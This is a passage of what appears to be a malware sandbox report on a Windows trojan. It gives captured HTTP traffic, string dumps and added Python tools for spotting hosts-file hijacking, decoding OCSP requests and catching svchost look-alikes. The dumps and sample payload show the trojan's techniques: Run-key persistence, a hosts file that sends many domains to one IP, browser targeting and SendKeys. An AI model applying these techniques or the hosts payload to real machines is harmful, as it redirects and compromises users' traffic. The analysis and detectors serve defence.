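    Loopback entries ('127.0.0.1 ads.example') block rather than redirect,
    so they are not counted."""
    by_ip = defaultdict(set)
    for ip, host in pairs:
        addr = ipaddress.ip_address(ip)
        if addr.is_loopback or addr.is_unspecified:
            continue
        by_ip[ip].add(registrable_domain(host))
    return {ip: sorted(d) for ip, d in by_ip.items() if len(d) >= min_domains}


# Constructed sample in the shape of the captured payload (VVV in the report
# stands for www); one benign loopback line added for contrast.
SAMPLE_PAYLOAD = (
    "127.0.0.1 localhost\r\n"
    "170.178.171.31 www.176cc.cc..170.178.171.31 www.52my.com.."
    "170.178.171.31 www.crsky.com..170.178.171.31 crsky.com.."
    "170.178.171.31 dl.pconline.com.cn..170.178.171.31 pconline.com.cn.."
    "170.178.171.31 wanba.baidu.com..170.178.171.31 moyu.so"
)

if __name__ == "__main__":
    for ip, domains in find_sinkholes(parse_hosts_payload(SAMPLE_PAYLOAD)).items():
        print(f"{ip} hijacks {len(domains)} registrable domains: {', '.join(domains)}")
```

Run it against the full 5537-byte body (or against a host's %SystemRoot%\System32\drivers\etc\hosts) and a single IP owning dozens of unrelated game, download and portal domains stands out immediately; an ad-blocking hosts file maps everything to 127.0.0.1 or 0.0.0.0 and is skipped by design.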
GET /gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDBisczuS0Hu180XFAA== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
HTTP/1.1 200 OK
Date: Thu, 19 Jan 2017 00:40:23 GMT
Content-Type: application/ocsp-response
Content-Length: 1570
Connection: keep-alive
Set-Cookie: __cfduid=d2049b01a660478030f630d1690d5c2f91484786423; expires=Fri, 19-Jan-18 00:40:23 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Wed, 18 Jan 2017 21:33:38 GMT
Expires: Sun, 22 Jan 2017 21:33:38 GMT
ETag: "3b988710a19508382f2e4d9507fbb592efa91e39"
Cache-Control: public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 32363c2d86d8405c-SOF
[1570-byte DER-encoded OCSP response, binary not reproduced. Recoverable fields: producedAt/thisUpdate 20170118213338Z, nextUpdate 20170122213338Z; signed by the responder certificate "GlobalSign Organization Validation CA - SHA256 - G2 - OCSP Responder" (C=BE, O=GlobalSign nv-sa; valid 161124031843Z to 170224031843Z; policy URL hXXps://VVV.globalsign.com/repository/)]
<<< skipped >>>
GET /gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDBisczuS0Hu180XFAA== HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 18 Jan 2017 21:33:38 GMT
If-None-Match: "3b988710a19508382f2e4d9507fbb592efa91e39"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
HTTP/1.1 304 Not Modified
Date: Thu, 19 Jan 2017 00:40:27 GMT
Connection: keep-alive
Set-Cookie: __cfduid=dd9e2eab346214fdd619c23747ca55b821484786427; expires=Fri, 19-Jan-18 00:40:27 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Wed, 18 Jan 2017 21:33:38 GMT
Expires: Sun, 22 Jan 2017 21:33:38 GMT
ETag: "3b988710a19508382f2e4d9507fbb592efa91e39"
Cache-Control: public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 32363c44618a405c-SOF
GET /gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDGlwEnDh1Wq84Ev4Sw== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
HTTP/1.1 200 OK
Date: Thu, 19 Jan 2017 00:40:40 GMT
Content-Type: application/ocsp-response
Content-Length: 1570
Connection: keep-alive
Set-Cookie: __cfduid=d995cc79ed802be9825730749a8dec62d1484786440; expires=Fri, 19-Jan-18 00:40:40 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Wed, 18 Jan 2017 23:26:57 GMT
Expires: Sun, 22 Jan 2017 23:26:57 GMT
ETag: "ce2c9bab38408c822469b28825da8da8a11ff254"
Cache-Control: public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 32363c9250bb405c-SOF
[1570-byte DER-encoded OCSP response, binary not reproduced. Recoverable fields: producedAt/thisUpdate 20170118232657Z, nextUpdate 20170122232657Z; signed by the same "GlobalSign Organization Validation CA - SHA256 - G2 - OCSP Responder" certificate as above]
<<< skipped >>>
GET /gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDEVLD4SzDqtMG/eBnw== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
HTTP/1.1 200 OK
Date: Thu, 19 Jan 2017 00:40:51 GMT
Content-Type: application/ocsp-response
Content-Length: 1570
Connection: keep-alive
Set-Cookie: __cfduid=d56bb1059e2865a2d42351fb11199ebd51484786451; expires=Fri, 19-Jan-18 00:40:51 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Wed, 18 Jan 2017 23:28:53 GMT
Expires: Sun, 22 Jan 2017 23:28:53 GMT
ETag: "0db1f4e8f454c9f557e61810f001e1875842e319"
Cache-Control: public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 32363cdcc475405c-SOF
[1570-byte DER-encoded OCSP response, binary not reproduced. Recoverable fields: producedAt/thisUpdate 20170118232853Z, nextUpdate 20170122232853Z; signed by the same "GlobalSign Organization Validation CA - SHA256 - G2 - OCSP Responder" certificate as above]
<<< skipped >>>
GET / HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: VVV.taobao.com
HTTP/1.1 302 Found
Server: Tengine
Date: Thu, 19 Jan 2017 00:40:40 GMT
Content-Type: text/html
Content-Length: 258
Connection: keep-alive
Location: hXXps://VVV.taobao.com/
Set-Cookie: thw=ua; Path=/; Domain=.taobao.com; Expires=Fri, 19-Jan-18 00:40:40 GMT;
Strict-Transport-Security: max-age=31536000
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<h1>302 Found</h1>
<p>The requested resource resides temporarily under a different URI.</p>
<hr/>Powered by Tengine</body>
</html>
GET /rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAURO8EJH HTTP/1.1
Cache-Control: max-age = 10800
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 13 Oct 2016 07:50:34 GMT
If-None-Match: "6b9ba9eca642c891cc02365fc6161341647bd9fc"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.globalsign.com
HTTP/1.1 200 OK
Date: Thu, 19 Jan 2017 00:40:18 GMT
Content-Type: application/ocsp-response
Content-Length: 1518
Connection: keep-alive
Set-Cookie: __cfduid=dd5230a5dbbbba995e31d3feeb730dd801484786418; expires=Fri, 19-Jan-18 00:40:18 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Wed, 18 Jan 2017 22:23:23 GMT
Expires: Sun, 22 Jan 2017 22:23:23 GMT
ETag: "2e9ad832313d6be8aa684e9216f27afcf7f1b502"
Cache-Control: max-age=10800,public,no-transform,must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 32363c0ba4004056-SOF
<<< skipped >>>
Cache-Control: max-age = 10800
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 18 Jan 2017 22:23:23 GMT
If-None-Match: "2e9ad832313d6be8aa684e9216f27afcf7f1b502"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.globalsign.com
HTTP/1.1 304 Not Modified
Date: Thu, 19 Jan 2017 00:40:22 GMT
Connection: keep-alive
Set-Cookie: __cfduid=d2e82d71249719d20589d01ed4e4b9b3c1484786422; expires=Fri, 19-Jan-18 00:40:22 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Wed, 18 Jan 2017 22:23:23 GMT
Expires: Sun, 22 Jan 2017 22:23:23 GMT
ETag: "2e9ad832313d6be8aa684e9216f27afcf7f1b502"
Cache-Control: max-age=10800,public,no-transform,must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 32363c2325894056-SOF
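The requests to ocsp.globalsign.com and ocsp2.globalsign.com above carry the User-Agent Microsoft-CryptoAPI/6.1: they are certificate revocation checks made by the Windows 7 certificate engine during TLS validation, not traffic the sample generates itself, and they show up in most sandbox reports that include a browser session. The base64 blob in each GET path is a DER-encoded OCSPRequest (RFC 6960, appendix A), so the issuer hashes and the serial number being checked can be recovered offline and compared with the CA named in the response, which settles whether the exchange is benign noise or C2 dressed up as OCSP. The Python below is an added example, not tooling from the report; it uses a minimal DER walker so it needs no third-party ASN.1 library. The two paths are copied from the capture above; everything else (function names, the hash-OID table) is the example's own.

```python
"""Decode the OCSP request that Windows CryptoAPI embeds in a GET path
(RFC 6960 appendix A: base64(DER OCSPRequest) appended to the responder URL)."""
import base64
from urllib.parse import unquote

HASH_OIDS = {"1.3.14.3.2.26": "sha1", "2.16.840.1.101.3.4.2.1": "sha256"}


def _read_tlv(buf, pos):
    """Read one DER tag-length-value at pos; return (tag, value, next_pos)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long-form length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def _children(value):
    """Yield (tag, value) for each TLV directly inside a constructed value."""
    pos = 0
    while pos < len(value):
        tag, inner, pos = _read_tlv(value, pos)
        yield tag, inner


def _oid_to_str(raw):
    """Dotted form of a DER OID value (base-128 arcs; the first byte packs two)."""
    arcs, n = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        n = (n << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(n)
            n = 0
    return ".".join(map(str, arcs))


def extract_request_der(path):
    """Return the DER OCSPRequest from a GET path.

    The base64 text may itself contain '/' and '+', so the path cannot simply be
    split on '/': try each suffix of the path until one decodes to a SEQUENCE."""
    segments = unquote(path).lstrip("/").split("/")
    for i in range(len(segments)):
        candidate = "/".join(segments[i:])
        try:
            raw = base64.b64decode(candidate, validate=True)
        except ValueError:                 # binascii.Error is a ValueError
            continue
        if raw[:1] == b"\x30":             # DER SEQUENCE
            return raw
    raise ValueError("no base64 DER OCSPRequest found in path")


def decode_ocsp_get_path(path):
    """Return one dict per CertID in the request: hash algorithm, issuer name
    hash, issuer key hash and serial number (hex, exactly as DER-encoded)."""
    _, ocsp_request, _ = _read_tlv(extract_request_der(path), 0)
    # OCSPRequest ::= SEQUENCE { tbsRequest TBSRequest, optionalSignature [0] EXPLICIT ... }
    tbs_request = next(v for t, v in _children(ocsp_request) if t == 0x30)
    # TBSRequest: optional [0] version / [1] requestorName precede the
    # requestList SEQUENCE, so take the first universal SEQUENCE child.
    request_list = next(v for t, v in _children(tbs_request) if t == 0x30)
    results = []
    for _, request in _children(request_list):
        cert_id = next(_children(request))[1]          # Request ::= SEQUENCE { reqCert CertID, ... }
        alg, name_hash, key_hash, serial = [v for _, v in _children(cert_id)]
        oid = _oid_to_str(next(_children(alg))[1])     # AlgorithmIdentifier ::= SEQUENCE { OID, params }
        results.append({
            "hash_alg": HASH_OIDS.get(oid, oid),
            "issuer_name_hash": name_hash.hex(),
            "issuer_key_hash": key_hash.hex(),
            "serial": serial.hex(),
        })
    return results


# The two responder paths seen in the capture above (copied, not constructed).
CAPTURED_PATHS = [
    "/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDBisczuS0Hu180XFAA==",
    "/rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAURO8EJH",
]

if __name__ == "__main__":
    for p in CAPTURED_PATHS:
        print(p.split("/")[1], decode_ocsp_get_path(p))
```

The issuer key hash is the SHA-1 of the issuing CA's public key, i.e. that CA's subject key identifier; matching it against the CA named in the 1570-byte response body above ties the request to a GlobalSign-issued server certificate from the browser session rather than to anything the sample controls. A C2 channel that only mimics OCSP will not decode as a well-formed CertID.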
GET /images/new.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: hXXp://VVV.92117my.com/game.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.92117my.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 3803
Content-Type: application/x-javascript
Last-Modified: Tue, 28 Jul 2015 08:19:44 GMT
Accept-Ranges: bytes
ETag: "0d08028ec9d01:3fe"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
<<< skipped >>>
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://VVV.92117my.com/game.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.92117my.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 1166
Content-Type: image/jpeg
Last-Modified: Wed, 01 Jul 2015 07:57:44 GMT
Accept-Ranges: bytes
ETag: "08c919cd3b3d01:3fe"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
<<< skipped >>>
GET /logo.jpg HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://VVV.92117my.com/index1.htm
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.92117my.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 30031
Content-Type: image/jpeg
Last-Modified: Fri, 06 Jan 2017 05:34:02 GMT
Accept-Ranges: bytes
ETag: "fefcb7cde67d21:3fe"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
<<< skipped >>>
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: VVV.92117my.com
Connection: Keep-Alive
Cookie: CNZZDATA1255675994=993092947-1484785024-null|1484785024
HTTP/1.1 404 Not Found
Content-Length: 1308
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
<<< skipped >>>
GET /host.html HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.92117my.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 5219
Content-Type: text/html
Last-Modified: Fri, 13 Jan 2017 12:48:11 GMT
Accept-Ranges: bytes
ETag: "9ebc6c4c9b6dd21:3fe"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
<<< skipped >>>
GET /?business&un=5182235367&from=prin HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: passport.baidu.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Connection: keep-alive
Content-Type: text/html
Date: Thu, 19 Jan 2017 00:40:02 GMT
P3p: CP=" OTI DSP COR IVA OUR IND COM "
Server: Apache
Set-Cookie: BAIDUID=BB091D280D8BB9A4DA1BF274DD690B70:FG=1; expires=Fri, 19-Jan-18 00:40:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Tracecode: 24029743220283886346011908
Tracecode: 24029743220703316746011908
Vary: Accept-Encoding
Vary: Accept-Encoding
<<< skipped >>>
GET /images/xx.css HTTP/1.1
Accept: text/css
Referer: hXXp://VVV.92117my.com/game.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.92117my.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 3604
Content-Type: text/css
Last-Modified: Wed, 01 Jul 2015 07:57:44 GMT
Accept-Ranges: bytes
ETag: "08c919cd3b3d01:3fe"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
<<< skipped >>>
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://VVV.92117my.com/game.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.92117my.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 17599
Content-Type: image/jpeg
Last-Modified: Wed, 01 Jul 2015 07:57:44 GMT
Accept-Ranges: bytes
ETag: "08c919cd3b3d01:3fe"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
<<< skipped >>>
GET /jc/hostjc.txt?WebShieldDRSessionVerify=EMGc17Wrs9kjNC7K8XBq HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: Safedog/4.0.0
Location: /jc/hostjc.txt
Content-Length: 0
Connection: Close
Content-Type: text/html
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
svchost.exe_1652:
.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
kernel32.dll
user32.dll
Kernel32.dll
ws2_32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xfjct
hXXp://ip.qq.com/
@Windows 2000
@Windows Server 2003
@Windows Vista
@Windows 7
@Windows 8
00-00-00-00-00-00
%System%\host.txt
%System%\drivers\etc\hosts
hXXp://passport.baidu.com/?business&un=5182235367&from=prin#0
340046815
hXXp://VVV.gxnkw.com/jc/tongji.txt
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
RASAPI32.dll
iphlpapi.dll
SHLWAPI.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
GetProcessHeap
WinExec
KERNEL32.dll
GetKeyState
USER32.dll
GetViewportOrgEx
GDI32.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
RegCreateKeyA
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
OLEAUT32.dll
COMCTL32.dll
WSOCK32.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
GetCPInfo
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
icmp.dll
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
X-X-X-X-X-X
;3 #>6.&
'2, / 0&7!4-)1#
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
right-curly-bracket
left-curly-bracket
0123456789
C:\Windows\svchost.exe
#include "l.chs\afxres.rc" // Standard components
PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADD
INGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
A.AQAtA
(*.*)
1.0.0.0
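The dump above contains the path C:\Windows\svchost.exe, and the next dump comes from a process named svchosl.exe running from the same directory. Both are masquerades: the genuine svchost.exe lives in System32 (or SysWOW64) and is started by services.exe, and a one-letter variation on its name is a classic way of hiding in a process list. The Python below is an added detection example, not code from the report or the sample. It scores a process list for svchost.exe in the wrong directory or under the wrong parent, and for look-alike names, using difflib's similarity ratio. Assumptions: the default C:\Windows system root, the 0.8 similarity threshold, and a constructed process list modelled on the names the report records; treat a parent-process hit as a lead rather than proof, since service hosts can legitimately be started in other ways on newer Windows versions.

```python
"""Flag processes masquerading as svchost.exe: the real one lives in System32 or
SysWOW64 and is started by services.exe; look-alike names such as svchosl.exe
are caught by name similarity."""
import ntpath
from difflib import SequenceMatcher

# Where the genuine svchost.exe lives (assumes the default C:\Windows SystemRoot).
LEGIT_SVCHOST_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# Assumed threshold: catches 'svchosl' and 'svchostlsp', ignores 'explorer' and 'lsass'.
SIMILARITY_THRESHOLD = 0.8


def name_similarity(a, b):
    """Ratio in [0, 1] of how alike two names are (difflib, case-insensitive)."""
    return SequenceMatcher(None, a.lower(), b.lower()).ratio()


def classify_process(image_path, parent_name=None):
    """Return a list of findings for one process; an empty list means nothing odd."""
    directory, name = ntpath.split(image_path.lower())
    stem = name[:-4] if name.endswith(".exe") else name
    findings = []
    if name == "svchost.exe":
        if directory not in LEGIT_SVCHOST_DIRS:
            findings.append("svchost.exe outside System32/SysWOW64")
        if parent_name and parent_name.lower() != "services.exe":
            findings.append(f"svchost.exe parent is {parent_name}, expected services.exe")
    elif name_similarity(stem, "svchost") >= SIMILARITY_THRESHOLD:
        findings.append(f"look-alike name {name} resembles svchost.exe")
    return findings


def triage(processes):
    """processes: iterable of (image_path, parent_name).
    Returns {image_path: findings} for every process with at least one finding."""
    report = {}
    for path, parent in processes:
        findings = classify_process(path, parent)
        if findings:
            report[path] = findings
    return report


# Constructed process list modelled on the names this report records.
SAMPLE_PROCESSES = [
    (r"C:\Windows\System32\svchost.exe", "services.exe"),
    (r"C:\Windows\svchost.exe", "explorer.exe"),
    (r"C:\Windows\svchosl.exe", "explorer.exe"),
    (r"C:\Windows\svchostlsp.exe", "117my.exe"),
    (r"C:\Windows\117my.exe", "explorer.exe"),
    (r"C:\Windows\explorer.exe", "userinit.exe"),
]

if __name__ == "__main__":
    for path, findings in triage(SAMPLE_PROCESSES).items():
        print(path, "->", "; ".join(findings))
```

Feed it the output of a process listing that includes image path and parent name (for example Get-CimInstance Win32_Process joined on ParentProcessId) and the three dropped binaries are reported while the real service host and the unrelated 117my.exe are not.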
svchosl.exe_3732:
.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
kernel32.dll
user32.dll
OLEACC.DLL
Kernel32.dll
ws2_32.dll
EnumChildWindows
EnumWindows
WebBrowser
%System%\gjzbjclb.txt
%System%\gjzjclb.txt
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xff
hXXp://
hXXp://passport.baidu.com/?business&un=5182235367&from=prin#0
340046815
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xf1
hXXp://ip.qq.com/
@Windows 2000
@Windows Server 2003
@Windows Vista
@Windows 7
@Windows 8
00-00-00-00-00-00
Chrome_WidgetWin_100
liebao.exe
maxthon.exe
360se.exe
2345Explorer.exe
MozillaWindowClass
firefox.exe
hao123Juzi.exe
SogouExplorer.exe
QQBrowser.exe
Chrome_WidgetWin_1
opera.exe
TaoBrowser.exe
TangoWeb.exe
TheWorld.exe
UCBrowser.exe
{7597C4B1-F62C-4e83-A35F-8B69C8779DC1}
baidubrowser.exe
360chrome.exe
TTraveler.exe
chrome.exe
vary.exe
Chrome_OmniboxView
f1browser.exe
went.exe
miniie.exe
Windows Internet Explorer_Frame
cpopmus32ex.exe
crowd.exe
slowt32ex.exe
Maxthon3Cls_MainFrmMsg
SmartUI.Win32.Edit
TT_WebCtrl
wscript.shell
SendKeys
hXXp://VVV.gxnkw.com/jc/tongji.txt
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
